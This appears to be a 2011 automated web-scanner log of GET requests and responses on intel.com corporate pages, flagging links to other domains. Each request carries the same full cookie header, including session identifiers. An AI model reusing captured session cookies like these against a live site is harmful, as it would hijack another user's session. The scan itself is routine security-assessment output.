GET /about/companyinfo/museum/index.htm?iid=subhdr+info_museum HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:39 GMT Content-Length: 32604 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The response contains the following links to other domains:
http://www.intc.com/
http://www.intc.com/?iid=subhdr+info_relations
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /about/companyinfo/policy/index.htm?iid=subhdr+info_policy HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:39 GMT Content-Length: 28058 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /about/companyinfo/worldahead/index.htm?iid=subhdr+info_world HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /about/corporateresponsibility/community/index.htm?iid=subhdr+cr_community HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 34184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
...[SNIP]... <li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a> ...[SNIP]... <noscript> <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">Get the Flash Plugin to see this Flash Banner.</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]... <br /> <a href="http://www.adobe.com/go/getflashplayer"> <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/> </a> ...[SNIP]...
GET /about/corporateresponsibility/education/index.htm?iid=gg_about+intel_education HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 46876
GET /about/corporateresponsibility/environment/index.htm?iid=gg_about+intel_environment HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 34658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /about/corporateresponsibility/foundation/index.htm?iid=subhdr+cr_foundation HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:33 GMT Content-Length: 31901 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
...[SNIP]... <li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a> ...[SNIP]... <noscript> <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">Get the Flash Plugin to see this Flash Banner.</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:13:35 GMT Connection: close Content-Length: 27286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /about/corporateresponsibility/report/index.htm?iid=subhdr+cr_report HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:14 GMT Connection: close Content-Length: 27087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The response contains the following links to other domains:
http://www.intc.com/?iid=subhdr+info_relations
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /about/map/index.htm?iid=subhdr+cr_globe HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:42 GMT Content-Length: 25974 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr-AE+invrel
Request
GET /ar_AE/consumer/products/processors/index.htm?iid=gg_ar_XR+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; 